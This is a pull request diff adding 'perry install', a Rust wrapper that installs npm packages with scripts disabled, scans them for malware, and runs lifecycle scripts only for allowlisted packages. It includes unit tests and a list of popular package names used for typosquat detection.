### PR TITLE
feat: perry install — secure wrapper around bun/npm with offline malware scan

### DIFF
--- a/crates/perry/src/commands/install/allowlist.rs
+++ b/crates/perry/src/commands/install/allowlist.rs
@@ -1,0 +1,116 @@
+//! Bundled trust allowlist for lifecycle-script execution.
+//!
+//! v1 ships allowlist-only script execution (no sandbox). The list
+//! covers the well-known native-binding / build-step packages whose
+//! `postinstall` is essential for the package to work (e.g. esbuild
+//! downloads its platform-specific binary; prisma generates client
+//! code; sharp builds its native module).
+//!
+//! v2 will sandbox these (macOS sandbox-exec / Linux bubblewrap +
+//! seccomp / Windows AppContainer) so even a compromised allowlisted
+//! package's script can't exfil credentials. Until v2 lands, the
+//! allowlist is the trust boundary: a malicious version of an
+//! allowlisted package WOULD run, so users on high-stakes hosts can
+//! `--installer=npm` + omit the allowlist via package.json's
+//! `perry.disallowScripts` (TODO Phase 9.1) or simply
+//! `--run-scripts-all=false` (the default).
+
+const EXACT: &[&str] = &[
+    // Build / bundler tooling
+    "esbuild",
+    "swc",
+    "@swc/core",
+    "@swc/wasm",
+    "@biomejs/biome",
+    "lightningcss",
+    // Database / ORM
+    "prisma",
+    "@prisma/client",
+    "@prisma/engines",
+    "better-sqlite3",
+    "sqlite3",
+    "leveldown",
+    // Crypto / native compute
+    "bcrypt",
+    "argon2",
+    "node-sass", // legacy but still in long-tail use
+    // Image / media
+    "sharp",
+    "canvas",
+    // Browser automation
+    "electron",
+    "puppeteer",
+    "puppeteer-core",
+    "playwright",
+    "@playwright/test",
+    "@playwright/browser-chromium",
+    // WebSocket native
+    "bufferutil",
+    "utf-8-validate",
+    // macOS-only fs watcher
+    "fsevents",
+    // Native binding glue
+    "node-gyp",
+    "node-gyp-build",
+    "node-pre-gyp",
+    "prebuild-install",
+    "@mapbox/node-pre-gyp",
+    "@parcel/watcher",
+    "protobufjs",
+    "grpc",
+    "@grpc/grpc-js",
+];
+
+/// Scoped prefixes — match any package whose name starts with one of
+/// these. Used for platform-specific subpackages that npm ships per
+/// (os, arch) and that need their install script (a platform check, a
+/// binary chmod, etc.). Listing each variant explicitly would be
+/// tedious and version-fragile.
+const PREFIXES: &[&str] = &[
+    "@next/swc-",
+    "@tailwindcss/oxide",
+    "@biomejs/cli-",
+    "@esbuild/",
+    "@swc/core-",
+    "lightningcss-",
+    "@rollup/rollup-",
+    "@parcel/",
+    "@playwright/",
+    "@puppeteer/",
+    "@prisma/",
+    "@napi-rs/",
+];
+
+/// Is this package on the bundled trust allowlist?
+pub fn is_bundled(name: &str) -> bool {
+    EXACT.iter().any(|n| *n == name) || PREFIXES.iter().any(|p| name.starts_with(p))
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn exact_matches() {
+        assert!(is_bundled("esbuild"));
+        assert!(is_bundled("sharp"));
+        assert!(is_bundled("prisma"));
+        assert!(is_bundled("@prisma/client"));
+    }
+
+    #[test]
+    fn prefix_matches() {
+        assert!(is_bundled("@next/swc-darwin-arm64"));
+        assert!(is_bundled("@esbuild/darwin-arm64"));
+        assert!(is_bundled("@tailwindcss/oxide-linux-x64-gnu"));
+        assert!(is_bundled("@napi-rs/canvas-darwin-arm64"));
+    }
+
+    #[test]
+    fn unrelated_not_matched() {
+        assert!(!is_bundled("lodash"));
+        assert!(!is_bundled("evilpkg"));
+        assert!(!is_bundled("esbuild-evil")); // typosquat shape, not allowed
+        assert!(!is_bundled("@scope/random"));
+    }
+}

--- a/crates/perry/src/commands/install/detect.rs
+++ b/crates/perry/src/commands/install/detect.rs
@@ -1,0 +1,99 @@
+//! Installer detection: pick `bun` if available, else `npm`, else error.
+
+use anyhow::{anyhow, bail, Result};
+use std::process::Command;
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum Installer {
+    Bun,
+    Npm,
+}
+
+impl Installer {
+    pub fn binary(&self) -> &'static str {
+        match self {
+            Installer::Bun => "bun",
+            Installer::Npm => "npm",
+        }
+    }
+
+    pub fn print_banner(&self, use_color: bool) {
+        let label = match self {
+            Installer::Bun => "bun",
+            Installer::Npm => "npm",
+        };
+        if use_color {
+            eprintln!(
+                "\x1b[1;36mperry install\x1b[0m \x1b[2m(via {} install --ignore-scripts)\x1b[0m",
+                label
+            );
+        } else {
+            eprintln!("perry install (via {} install --ignore-scripts)", label);
+        }
+    }
+}
+
+/// Probe whether a binary exists and responds to `--version`.
+pub fn probe(bin: &str) -> bool {
+    Command::new(bin)
+        .arg("--version")
+        .stdout(std::process::Stdio::null())
+        .stderr(std::process::Stdio::null())
+        .status()
+        .map(|s| s.success())
+        .unwrap_or(false)
+}
+
+/// Pick an installer, honoring an optional explicit override.
+///
+/// Override values are case-insensitive; "bun" or "npm" are accepted.
+/// If an override is given and that binary isn't on PATH, we error
+/// loudly rather than silently fall back — the user asked for a
+/// specific tool.
+pub fn pick(override_choice: Option<&str>) -> Result<Installer> {
+    if let Some(name) = override_choice {
+        let choice = match name.to_ascii_lowercase().as_str() {
+            "bun" => Installer::Bun,
+            "npm" => Installer::Npm,
+            other => bail!(
+                "unknown --installer value '{}'; expected 'bun' or 'npm'",
+                other
+            ),
+        };
+        if !probe(choice.binary()) {
+            return Err(anyhow!(
+                "--installer={} requested but `{}` not found on PATH",
+                name,
+                choice.binary()
+            ));
+        }
+        return Ok(choice);
+    }
+
+    if probe("bun") {
+        return Ok(Installer::Bun);
+    }
+    if probe("npm") {
+        return Ok(Installer::Npm);
+    }
+    bail!(
+        "neither `bun` nor `npm` is on PATH. Install one of them and re-run, \
+         or pass --installer=<name> after putting it on PATH."
+    )
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn override_unknown_errors() {
+        let err = pick(Some("yarn")).unwrap_err().to_string();
+        assert!(err.contains("unknown --installer"));
+    }
+
+    #[test]
+    fn probe_nonexistent_returns_false() {
+        assert!(!probe("definitely-not-a-real-binary-zzz-1234"));
+    }
+}

--- a/crates/perry/src/commands/install/lifecycle.rs
+++ b/crates/perry/src/commands/install/lifecycle.rs
@@ -1,0 +1,347 @@
+//! Lifecycle-script execution. Only invoked after the scan passes
+//! (or its findings have been overridden). Runs `preinstall`,
+//! `install`, and `postinstall` for packages on a trust allowlist —
+//! the bundled one in [`allowlist`] plus any names the user opted
+//! into via `package.json -> perry.allowScripts` or the
+//! `--run-scripts` / `--run-scripts-all` CLI flags.
+//!
+//! Scripts are executed under the host shell (`sh -c` on Unix,
+//! `cmd /C` on Windows), in the package's directory, with PATH
+//! prefixed so `node_modules/.bin` binaries (typescript, node-gyp,
+//! prebuild-install, …) are reachable without absolute paths.
+//!
+//! v2 will run these in an OS sandbox with redacted env (no SSH /
+//! AWS / GitHub / npm tokens) and a tight filesystem + network
+//! profile. v1 trusts the allowlist: a compromised version of an
+//! allowlisted package's script WILL run.
+
+use anyhow::{bail, Result};
+use serde_json::Value;
+use std::collections::BTreeSet;
+use std::path::Path;
+use std::process::Command;
+
+use super::allowlist;
+use super::scanner::ScannedPackage;
+use super::InstallArgs;
+
+const LIFECYCLE_KEYS: &[&str] = &["preinstall", "install", "postinstall"];
+
+/// Top-level entry: decide which packages are allowed to run scripts,
+/// run them, and return a brief summary line per skipped package
+/// that had scripts but didn't pass the trust gate.
+pub fn run_all(
+    packages: &[ScannedPackage],
+    project_root: &Path,
+    args: &InstallArgs,
+) -> Result<RunSummary> {
+    let user_opt_in = read_user_allowscripts(project_root);
+    let mut summary = RunSummary::default();
+
+    for pkg in packages {
+        if !has_lifecycle_scripts(pkg) {
+            continue;
+        }
+
+        let trusted = is_trusted(&pkg.name, &user_opt_in, args);
+        if !trusted {
+            summary.skipped.push(pkg.name.clone());
+            continue;
+        }
+
+        run_package(pkg, project_root)?;
+        summary.ran.push(pkg.name.clone());
+    }
+    Ok(summary)
+}
+
+#[derive(Default, Debug)]
+pub struct RunSummary {
+    pub ran: Vec<String>,
+    pub skipped: Vec<String>,
+}
+
+fn has_lifecycle_scripts(pkg: &ScannedPackage) -> bool {
+    let scripts = match pkg.manifest.get("scripts").and_then(|v| v.as_object()) {
+        Some(s) => s,
+        None => return false,
+    };
+    LIFECYCLE_KEYS
+        .iter()
+        .any(|k| scripts.get(*k).and_then(|v| v.as_str()).is_some())
+}
+
+fn is_trusted(name: &str, user_opt_in: &BTreeSet<String>, args: &InstallArgs) -> bool {
+    if args.run_scripts_all {
+        return true;
+    }
+    if allowlist::is_bundled(name) {
+        return true;
+    }
+    if user_opt_in.contains(name) {
+        return true;
+    }
+    if args.run_scripts.iter().any(|p| p == name) {
+        return true;
+    }
+    false
+}
+
+/// Read `perry.allowScripts` from the project root's package.json.
+/// Returns an empty set if the file or key is missing — this is the
+/// non-Perry-project case, where we just rely on the bundled
+/// allowlist + CLI flags.
+fn read_user_allowscripts(project_root: &Path) -> BTreeSet<String> {
+    let pkg_json = project_root.join("package.json");
+    let content = match std::fs::read_to_string(&pkg_json) {
+        Ok(c) => c,
+        Err(_) => return BTreeSet::new(),
+    };
+    let json: Value = match serde_json::from_str(&content) {
+        Ok(j) => j,
+        Err(_) => return BTreeSet::new(),
+    };
+    json.get("perry")
+        .and_then(|v| v.get("allowScripts"))
+        .and_then(|v| v.as_array())
+        .map(|arr| {
+            arr.iter()
+                .filter_map(|v| v.as_str().map(String::from))
+                .collect()
+        })
+        .unwrap_or_default()
+}
+
+fn run_package(pkg: &ScannedPackage, project_root: &Path) -> Result<()> {
+    let scripts = pkg
+        .manifest
+        .get("scripts")
+        .and_then(|v| v.as_object())
+        .expect("caller already verified has_lifecycle_scripts");
+
+    let augmented_path = augment_path(project_root, &pkg.dir);
+
+    for key in LIFECYCLE_KEYS {
+        let body = match scripts.get(*key).and_then(|v| v.as_str()) {
+            Some(b) => b.trim(),
+            None => continue,
+        };
+        if body.is_empty() {
+            continue;
+        }
+
+        let (shell, flag) = if cfg!(windows) {
+            ("cmd", "/C")
+        } else {
+            ("sh", "-c")
+        };
+
+        let status = Command::new(shell)
+            .arg(flag)
+            .arg(body)
+            .current_dir(&pkg.dir)
+            .env("PATH", &augmented_path)
+            .env("npm_lifecycle_event", key)
+            .env("npm_lifecycle_script", body)
+            .env("npm_package_name", &pkg.name)
+            .env("npm_package_version", &pkg.version)
+            // INIT_CWD is what npm sets to the project root — many
+            // scripts read it to locate sibling packages.
+            .env("INIT_CWD", project_root)
+            .status()
+            .map_err(|e| {
+                anyhow::anyhow!("failed to spawn shell for {} '{}': {}", pkg.name, key, e)
+            })?;
+
+        if !status.success() {
+            bail!(
+                "lifecycle script '{}' for package '{}' exited with status {}",
+                key,
+                pkg.name,
+                status
+                    .code()
+                    .map(|c| c.to_string())
+                    .unwrap_or_else(|| "signal".into())
+            );
+        }
+    }
+    Ok(())
+}
+
+fn augment_path(project_root: &Path, pkg_dir: &Path) -> std::ffi::OsString {
+    let pkg_bin = pkg_dir.join("node_modules").join(".bin");
+    let root_bin = project_root.join("node_modules").join(".bin");
+    let sep = if cfg!(windows) { ";" } else { ":" };
+    let mut out = std::ffi::OsString::new();
+    if pkg_bin.is_dir() {
+        out.push(pkg_bin.as_os_str());
+        out.push(sep);
+    }
+    if root_bin.is_dir() {
+        out.push(root_bin.as_os_str());
+        out.push(sep);
+    }
+    if let Some(existing) = std::env::var_os("PATH") {
+        out.push(existing);
+    }
+    out
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+    use std::fs;
+    use std::path::PathBuf;
+    use tempfile::TempDir;
+
+    fn mk_pkg(name: &str, scripts: serde_json::Value) -> ScannedPackage {
+        ScannedPackage {
+            name: name.into(),
+            version: "1.0.0".into(),
+            dir: PathBuf::from("/t"),
+            manifest: json!({"name": name, "version": "1.0.0", "scripts": scripts}),
+        }
+    }
+
+    fn args() -> InstallArgs {
+        InstallArgs {
+            packages: vec![],
+            save_dev: false,
+            global: false,
+            production: false,
+            installer: None,
+            skip_scan: false,
+            allow_risky: vec![],
+            allow_risky_all: false,
+            run_scripts: vec![],
+            run_scripts_all: false,
+            check_freshness: false,
+            json: false,
+        }
+    }
+
+    #[test]
+    fn has_lifecycle_detects_postinstall() {
+        let p = mk_pkg("x", json!({"postinstall": "echo"}));
+        assert!(has_lifecycle_scripts(&p));
+    }
+
+    #[test]
+    fn has_lifecycle_ignores_non_install_scripts() {
+        let p = mk_pkg("x", json!({"build": "tsc", "test": "jest"}));
+        assert!(!has_lifecycle_scripts(&p));
+    }
+
+    #[test]
+    fn trust_bundled() {
+        assert!(is_trusted("esbuild", &BTreeSet::new(), &args()));
+    }
+
+    #[test]
+    fn trust_user_opt_in() {
+        let mut s = BTreeSet::new();
+        s.insert("my-internal-pkg".to_string());
+        assert!(is_trusted("my-internal-pkg", &s, &args()));
+    }
+
+    #[test]
+    fn trust_run_scripts_cli_flag() {
+        let mut a = args();
+        a.run_scripts = vec!["mypkg".into()];
+        assert!(is_trusted("mypkg", &BTreeSet::new(), &a));
+    }
+
+    #[test]
+    fn trust_run_scripts_all_flag() {
+        let mut a = args();
+        a.run_scripts_all = true;
+        assert!(is_trusted("random-untrusted", &BTreeSet::new(), &a));
+    }
+
+    #[test]
+    fn untrusted_by_default() {
+        assert!(!is_trusted("random", &BTreeSet::new(), &args()));
+    }
+
+    #[test]
+    fn read_allowscripts_from_package_json() {
+        let td = TempDir::new().unwrap();
+        fs::write(
+            td.path().join("package.json"),
+            r#"{"name":"p","perry":{"allowScripts":["custom-pkg","another"]}}"#,
+        )
+        .unwrap();
+        let set = read_user_allowscripts(td.path());
+        assert!(set.contains("custom-pkg"));
+        assert!(set.contains("another"));
+    }
+
+    #[test]
+    fn read_allowscripts_missing_section_is_empty() {
+        let td = TempDir::new().unwrap();
+        fs::write(td.path().join("package.json"), r#"{"name":"p"}"#).unwrap();
+        assert!(read_user_allowscripts(td.path()).is_empty());
+    }
+
+    #[test]
+    fn read_allowscripts_missing_file_is_empty() {
+        let td = TempDir::new().unwrap();
+        assert!(read_user_allowscripts(td.path()).is_empty());
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn run_lifecycle_executes_script() {
+        // Real shell-out: write a tiny package, allowlist it via
+        // run_scripts_all, and assert the postinstall ran (it touches
+        // a sentinel file).
+        let td = TempDir::new().unwrap();
+        let pkg_dir = td.path().join("node_modules/sentinel-pkg");
+        fs::create_dir_all(&pkg_dir).unwrap();
+        let sentinel = pkg_dir.join("ran.txt");
+        let manifest = json!({
+            "name":"sentinel-pkg","version":"1.0.0",
+            "scripts": {"postinstall": format!("touch {}", sentinel.display())}
+        });
+        fs::write(pkg_dir.join("package.json"), manifest.to_string()).unwrap();
+        let pkg = ScannedPackage {
+            name: "sentinel-pkg".into(),
+            version: "1.0.0".into(),
+            dir: pkg_dir,
+            manifest,
+        };
+        let mut a = args();
+        a.run_scripts_all = true;
+        let summary = run_all(std::slice::from_ref(&pkg), td.path(), &a).unwrap();
+        assert_eq!(summary.ran, vec!["sentinel-pkg".to_string()]);
+        assert!(sentinel.exists(), "postinstall sentinel was not created");
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn run_lifecycle_skips_untrusted() {
+        let td = TempDir::new().unwrap();
+        let pkg_dir = td.path().join("node_modules/random-pkg");
+        fs::create_dir_all(&pkg_dir).unwrap();
+        let sentinel = pkg_dir.join("ran.txt");
+        let manifest = json!({
+            "name":"random-pkg","version":"1.0.0",
+            "scripts": {"postinstall": format!("touch {}", sentinel.display())}
+        });
+        fs::write(pkg_dir.join("package.json"), manifest.to_string()).unwrap();
+        let pkg = ScannedPackage {
+            name: "random-pkg".into(),
+            version: "1.0.0".into(),
+            dir: pkg_dir,
+            manifest,
+        };
+        let summary = run_all(std::slice::from_ref(&pkg), td.path(), &args()).unwrap();
+        assert!(summary.ran.is_empty());
+        assert_eq!(summary.skipped, vec!["random-pkg".to_string()]);
+        assert!(
+            !sentinel.exists(),
+            "postinstall should NOT have run for untrusted pkg"
+        );
+    }
+}

--- a/crates/perry/src/commands/install/mod.rs
+++ b/crates/perry/src/commands/install/mod.rs
@@ -1,0 +1,325 @@
+//! `perry install` — secure wrapper around bun/npm.
+//!
+//! Architecture: shell out to `bun install --ignore-scripts` (or `npm install
+//! --ignore-scripts` as fallback) to get a populated `node_modules/` with
+//! *no* lifecycle scripts run, then statically scan the tree for known
+//! malware patterns, then run scripts only for packages on a trust
+//! allowlist (or the user's explicit opt-in).
+//!
+//! The scan + script gate lives entirely in Perry. The
+//! fetch/resolve/lockfile/extract work is delegated to whichever installer
+//! the user already has on PATH.
+
+use anyhow::Result;
+use clap::Args;
+use std::path::{Path, PathBuf};
+
+use crate::OutputFormat;
+
+pub mod allowlist;
+pub mod detect;
+pub mod lifecycle;
+pub mod runner;
+pub mod scanner;
+
+#[derive(Args, Debug)]
+pub struct InstallArgs {
+    /// Packages to install (npm-style: `pkg`, `pkg@version`, `@scope/pkg`).
+    /// With no packages, installs everything declared in package.json.
+    #[arg(value_name = "PKG")]
+    pub packages: Vec<String>,
+
+    /// Add to devDependencies.
+    #[arg(long, short = 'D', alias = "save-dev")]
+    pub save_dev: bool,
+
+    /// Install globally.
+    #[arg(long, short = 'g')]
+    pub global: bool,
+
+    /// Skip devDependencies (production install).
+    #[arg(long)]
+    pub production: bool,
+
+    /// Force a specific installer backend. Auto-detect picks bun first,
+    /// then npm.
+    #[arg(long, value_name = "BUN|NPM")]
+    pub installer: Option<String>,
+
+    /// Skip the malware scan and only wrap the installer. Intended for
+    /// debugging or when the user is intentionally vetting the project by
+    /// hand. Lifecycle scripts still don't run.
+    #[arg(long)]
+    pub skip_scan: bool,
+
+    /// Bypass the scan for a single package (repeat to bypass multiple).
+    #[arg(long = "allow-risky", value_name = "PKG")]
+    pub allow_risky: Vec<String>,
+
+    /// Bypass the scan entirely. CI / emergency escape hatch.
+    #[arg(long)]
+    pub allow_risky_all: bool,
+
+    /// Run lifecycle scripts for one extra package beyond the bundled
+    /// allowlist (repeat for multiple).
+    #[arg(long = "run-scripts", value_name = "PKG")]
+    pub run_scripts: Vec<String>,
+
+    /// Run all lifecycle scripts (npm-equivalent behavior). Unsafe.
+    #[arg(long)]
+    pub run_scripts_all: bool,
+
+    /// Opt-in P1 freshness checks (publish age, maintainer drift). Adds
+    /// one network round-trip per direct dependency.
+    #[arg(long)]
+    pub check_freshness: bool,
+
+    /// Machine-readable JSON output.
+    #[arg(long)]
+    pub json: bool,
+}
+
+pub fn run(args: InstallArgs, _format: OutputFormat, use_color: bool) -> Result<()> {
+    let installer = detect::pick(args.installer.as_deref())?;
+
+    if !args.json {
+        installer.print_banner(use_color);
+    }
+
+    runner::install(&installer, &args)?;
+
+    if args.skip_scan {
+        if !args.json {
+            eprintln!("perry install: --skip-scan in effect, no scan performed");
+        }
+        return Ok(());
+    }
+
+    // Locate node_modules from cwd (or any parent). bun/npm always create
+    // it at the project root, which is where the user invoked perry from
+    // unless they explicitly cd'd into a subdir.
+    let cwd = std::env::current_dir()?;
+    let node_modules = match find_node_modules(&cwd) {
+        Some(p) => p,
+        None => {
+            if !args.json {
+                eprintln!(
+                    "perry install: warning — node_modules/ not found after install \
+                     (was --global used?); skipping scan"
+                );
+            }
+            return Ok(());
+        }
+    };
+    let project_root = node_modules
+        .parent()
+        .map(Path::to_path_buf)
+        .unwrap_or_else(|| cwd.clone());
+
+    let packages = scanner::discover_packages(&node_modules);
+    let report = scanner::scan_packages(&packages, &args.allow_risky, args.allow_risky_all);
+    report.write_to(&project_root)?;
+
+    if args.json {
+        // Machine-readable mode: dump the report and let exit code carry
+        // the verdict.
+        println!("{}", serde_json::to_string_pretty(&report)?);
+    } else {
+        print_summary(&report, use_color);
+        if !report.findings.is_empty() {
+            print_findings(&report, use_color);
+        }
+        print_outcome(&report, use_color);
+    }
+
+    if matches!(report.verdict, scanner::report::Verdict::Blocked) {
+        // node_modules is on disk but no lifecycle scripts have run —
+        // it's safe to exit non-zero here. The user can inspect
+        // node_modules, then re-run with --allow-risky as appropriate.
+        std::process::exit(1);
+    }
+
+    // Scan passed (Clean or Overridden) — now run lifecycle scripts
+    // for packages on the trust gate.
+    let summary = lifecycle::run_all(&packages, &project_root, &args)?;
+    if !args.json {
+        print_lifecycle_summary(&summary, use_color);
+    }
+
+    Ok(())
+}
+
+fn print_lifecycle_summary(summary: &lifecycle::RunSummary, use_color: bool) {
+    if !summary.ran.is_empty() {
+        if use_color {
+            eprintln!(
+                "\x1b[2mperry install: ran lifecycle scripts for {} allowlisted package(s): {}\x1b[0m",
+                summary.ran.len(),
+                summary.ran.join(", ")
+            );
+        } else {
+            eprintln!(
+                "perry install: ran lifecycle scripts for {} allowlisted package(s): {}",
+                summary.ran.len(),
+                summary.ran.join(", ")
+            );
+        }
+    }
+    if !summary.skipped.is_empty() {
+        if use_color {
+            eprintln!(
+                "\x1b[33m▲\x1b[0m perry install: skipped lifecycle scripts for {} non-allowlisted \
+                 package(s): {}",
+                summary.skipped.len(),
+                summary.skipped.join(", ")
+            );
+            eprintln!(
+                "  add to `perry.allowScripts` in package.json, or use `--run-scripts <pkg>` to run."
+            );
+        } else {
+            eprintln!(
+                "perry install: skipped lifecycle scripts for {} non-allowlisted package(s): {}",
+                summary.skipped.len(),
+                summary.skipped.join(", ")
+            );
+            eprintln!(
+                "  add to `perry.allowScripts` in package.json, or use `--run-scripts <pkg>` to run."
+            );
+        }
+    }
+}
+
+fn print_summary(report: &scanner::report::ScanReport, use_color: bool) {
+    let pkg_word = if report.package_count == 1 {
+        "package"
+    } else {
+        "packages"
+    };
+    if use_color {
+        eprintln!(
+            "\x1b[2mperry install: scanned {} {}\x1b[0m",
+            report.package_count, pkg_word
+        );
+    } else {
+        eprintln!(
+            "perry install: scanned {} {}",
+            report.package_count, pkg_word
+        );
+    }
+}
+
+fn print_findings(report: &scanner::report::ScanReport, use_color: bool) {
+    use scanner::report::Severity;
+    eprintln!();
+    for f in &report.findings {
+        let icon = match (&f.severity, f.overridden) {
+            (Severity::P0, true) => {
+                if use_color {
+                    "\x1b[33m▲\x1b[0m"
+                } else {
+                    "[OVERRIDDEN]"
+                }
+            }
+            (Severity::P0, false) => {
+                if use_color {
+                    "\x1b[31m⛔\x1b[0m"
+                } else {
+                    "[BLOCK]"
+                }
+            }
+            (Severity::P1, _) => {
+                if use_color {
+                    "\x1b[33m!\x1b[0m"
+                } else {
+                    "[WARN]"
+                }
+            }
+        };
+        let pkg = if use_color {
+            format!("\x1b[1m{}\x1b[0m", f.package)
+        } else {
+            f.package.clone()
+        };
+        eprintln!("  {} {} — {}", icon, pkg, f.rule);
+        eprintln!("     {}", f.message);
+        if let Some(loc) = &f.location {
+            if use_color {
+                eprintln!("     \x1b[2m({})\x1b[0m", loc);
+            } else {
+                eprintln!("     ({})", loc);
+            }
+        }
+        eprintln!();
+    }
+}
+
+fn print_outcome(report: &scanner::report::ScanReport, use_color: bool) {
+    use scanner::report::Verdict;
+    let p0 = report
+        .findings
+        .iter()
+        .filter(|f| matches!(f.severity, scanner::report::Severity::P0))
+        .count();
+    let blocked = report
+        .findings
+        .iter()
+        .filter(|f| matches!(f.severity, scanner::report::Severity::P0) && !f.overridden)
+        .count();
+    let overridden = p0 - blocked;
+    match report.verdict {
+        Verdict::Clean => {
+            if use_color {
+                eprintln!("\x1b[32m✓\x1b[0m perry install: scan clean");
+            } else {
+                eprintln!("perry install: scan clean");
+            }
+        }
+        Verdict::Overridden => {
+            if use_color {
+                eprintln!(
+                    "\x1b[33m▲\x1b[0m perry install: {} P0 finding(s) overridden by --allow-risky, proceeding",
+                    overridden
+                );
+            } else {
+                eprintln!(
+                    "perry install: {} P0 finding(s) overridden by --allow-risky, proceeding",
+                    overridden
+                );
+            }
+        }
+        Verdict::Blocked => {
+            let label = if use_color {
+                "\x1b[1;31mBLOCKED\x1b[0m"
+            } else {
+                "BLOCKED"
+            };
+            eprintln!(
+                "{} {} P0 finding(s). node_modules/ is on disk but no lifecycle \
+                 scripts have run — your environment is safe.",
+                label, blocked
+            );
+            eprintln!(
+                "  Re-run with --allow-risky <pkg> to bypass per-package, or \
+                 --allow-risky-all to bypass entirely."
+            );
+            eprintln!("  Report: .perry/install-report.json");
+        }
+    }
+}
+
+/// Find `node_modules/` by walking up from `start`. Duplicated from
+/// `compile/resolve.rs::find_node_modules` because that one is
+/// `pub(super)`; this copy lives close to where it's used so install
+/// doesn't depend on compile internals.
+fn find_node_modules(start: &Path) -> Option<PathBuf> {
+    let mut current = start.to_path_buf();
+    loop {
+        let nm = current.join("node_modules");
+        if nm.is_dir() {
+            return Some(nm);
+        }
+        if !current.pop() {
+            return None;
+        }
+    }
+}

--- a/crates/perry/src/commands/install/runner.rs
+++ b/crates/perry/src/commands/install/runner.rs
@@ -1,0 +1,69 @@
+//! Shell out to the chosen installer with `--ignore-scripts` so no
+//! package code executes during the install proper.
+
+use anyhow::{bail, Result};
+use std::process::Command;
+
+use super::detect::Installer;
+use super::InstallArgs;
+
+/// Build and run the underlying installer command. Inherits stdio so
+/// the user sees the installer's native progress output in real time.
+pub fn install(installer: &Installer, args: &InstallArgs) -> Result<()> {
+    let mut cmd = Command::new(installer.binary());
+    cmd.arg("install").arg("--ignore-scripts");
+
+    // Translate Perry-side flags into the installer's native flag.
+    match installer {
+        Installer::Bun => {
+            if args.save_dev {
+                cmd.arg("--dev");
+            }
+            if args.global {
+                cmd.arg("--global");
+            }
+            if args.production {
+                cmd.arg("--production");
+            }
+        }
+        Installer::Npm => {
+            if args.save_dev {
+                cmd.arg("--save-dev");
+            }
+            if args.global {
+                cmd.arg("--global");
+            }
+            if args.production {
+                // Modern npm prefers --omit=dev; --production is the legacy
+                // spelling and still works on every version since npm 1.
+                cmd.arg("--omit=dev");
+            }
+        }
+    }
+
+    for pkg in &args.packages {
+        cmd.arg(pkg);
+    }
+
+    let status = cmd.status().map_err(|e| {
+        anyhow::anyhow!(
+            "failed to spawn `{} install`: {}. Is `{}` on PATH?",
+            installer.binary(),
+            e,
+            installer.binary()
+        )
+    })?;
+
+    if !status.success() {
+        bail!(
+            "`{} install --ignore-scripts` exited with status {}",
+            installer.binary(),
+            status
+                .code()
+                .map(|c| c.to_string())
+                .unwrap_or_else(|| "signal".into())
+        );
+    }
+
+    Ok(())
+}

--- a/crates/perry/src/commands/install/scanner/data/top_packages.txt
+++ b/crates/perry/src/commands/install/scanner/data/top_packages.txt
@@ -1,0 +1,406 @@
+# Top npm packages by download volume — used by the typosquat rule
+# (scanner/typosquat.rs). Lines beginning with `#` and blank lines are
+# ignored. Names are case-sensitive (npm names are lowercase by
+# convention, so this is the practical normalization).
+#
+# This is a hand-curated snapshot of the most-typosquatted package
+# names. Refresh periodically; the file is embedded into the binary at
+# compile time via include_str!, so updates require a rebuild.
+#
+# Snapshot date: 2026-05-13
+# Source: npm public registry download statistics + known attack reports.
+
+# Frameworks
+react
+react-dom
+react-native
+react-router
+react-router-dom
+vue
+angular
+svelte
+next
+nuxt
+preact
+solid-js
+remix
+
+# Utilities
+lodash
+underscore
+ramda
+moment
+dayjs
+date-fns
+chalk
+commander
+yargs
+ora
+inquirer
+prompt
+debug
+ms
+uuid
+nanoid
+shortid
+mkdirp
+rimraf
+glob
+fast-glob
+minimatch
+semver
+qs
+
+# Tooling
+typescript
+ts-node
+tsx
+eslint
+prettier
+jest
+mocha
+chai
+vitest
+ava
+tap
+nyc
+husky
+lint-staged
+nodemon
+pm2
+concurrently
+
+# HTTP / network
+axios
+node-fetch
+got
+superagent
+undici
+needle
+isomorphic-fetch
+cross-fetch
+form-data
+
+# Servers
+express
+fastify
+koa
+hapi
+hono
+nestjs
+restify
+polka
+
+# Databases
+pg
+mysql
+mysql2
+redis
+ioredis
+mongoose
+mongodb
+sqlite3
+better-sqlite3
+drizzle-orm
+prisma
+sequelize
+typeorm
+knex
+
+# Build tools
+webpack
+rollup
+vite
+esbuild
+swc
+turbo
+parcel
+gulp
+grunt
+browserify
+metro
+
+# Babel
+babel
+babel-core
+babel-loader
+babel-runtime
+
+# Testing helpers
+sinon
+nock
+supertest
+puppeteer
+playwright
+cypress
+testing-library
+
+# State / data
+redux
+zustand
+mobx
+react-query
+tanstack-query
+swr
+immer
+immutable
+
+# Auth / crypto
+jsonwebtoken
+bcrypt
+bcryptjs
+argon2
+crypto-js
+passport
+oauth
+oauth2-server
+node-jose
+jose
+
+# WebSocket
+ws
+socket.io
+socket.io-client
+sockjs
+engine.io
+
+# Streams / events
+event-stream
+through2
+readable-stream
+stream-buffers
+eventemitter3
+rxjs
+
+# CSS / UI
+tailwindcss
+postcss
+sass
+less
+stylus
+styled-components
+emotion
+classnames
+clsx
+
+# CLI
+clipanion
+caporal
+oclif
+boxen
+figlet
+update-notifier
+
+# Logging
+winston
+pino
+bunyan
+log4js
+loglevel
+morgan
+
+# Validation
+joi
+yup
+zod
+ajv
+class-validator
+io-ts
+
+# Templating
+handlebars
+ejs
+pug
+mustache
+nunjucks
+
+# Bundles often targeted
+fs-extra
+yaml
+js-yaml
+ini
+dotenv
+config
+node-config
+cosmiconfig
+rc
+
+# AI / LLM
+openai
+anthropic
+langchain
+
+# Cloud SDKs
+aws-sdk
+@aws-sdk/client-s3
+@google-cloud/storage
+@azure/storage-blob
+
+# Specific high-value secondary targets (commonly typosquatted)
+async
+bluebird
+async-each
+async-eachof
+request
+request-promise
+underscore.string
+gulp-util
+shelljs
+which
+cross-spawn
+execa
+spawn-sync
+strip-ansi
+ansi-regex
+color-name
+color-convert
+supports-color
+has-flag
+escape-string-regexp
+function-bind
+has
+object-keys
+object-assign
+es-abstract
+define-properties
+get-intrinsic
+side-channel
+internal-slot
+call-bind
+which-typed-array
+is-typed-array
+is-array-buffer
+typed-array-buffer
+buffer
+safe-buffer
+ieee754
+base64-js
+brace-expansion
+balanced-match
+concat-map
+deep-equal
+deep-extend
